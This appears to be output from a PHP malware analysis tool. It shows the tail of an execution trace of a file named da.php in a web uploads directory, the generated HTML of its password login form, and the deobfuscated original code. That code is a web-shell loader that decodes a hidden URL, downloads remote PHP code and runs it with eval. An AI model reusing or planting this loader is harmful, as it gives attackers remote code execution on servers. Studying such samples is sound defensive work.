4 34 0 0.141468 910608 function_exists 0 /var/www/html/uploads/da.php(1) : eval()'d code 384 1 'phpinfo'
4 34 1 0.141482 910648
4 34 R TRUE
3 A /var/www/html/uploads/da.php(1) : eval()'d code 384 $infos = [0 => NULL, 1 => '1427846fd2b8edccba73f7f080e2b50a', 2 => TRUE, 3 => '127.0.0.1']
4 35 0 0.141513 910608 md5 0 /var/www/html/uploads/da.php(1) : eval()'d code 385 1 NULL
4 35 1 0.141526 910704
4 35 R 'd41d8cd98f00b204e9800998ecf8427e'
0.142294 830400
TRACE END [2023-02-12 21:59:23.191505]
Generated HTML code
<html><head></head><body><center><form method="POST"><input type="password" name="getpwd"> <input type="submit" value="Go"></form></center></body></html>Original PHP code
<?php $password="1427846fd2b8edccba73f7f080e2b50a";$ch=curl_init(base64_decode(strrev("AHaw5iclRWYvx2Ll5Wan5WZv4Wah12LsxWZoNlcwgHNI9CZp92Z5xGbpd3Lt92YuQnblRnbvNmclNXdiVHa0l2ZucXYy9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>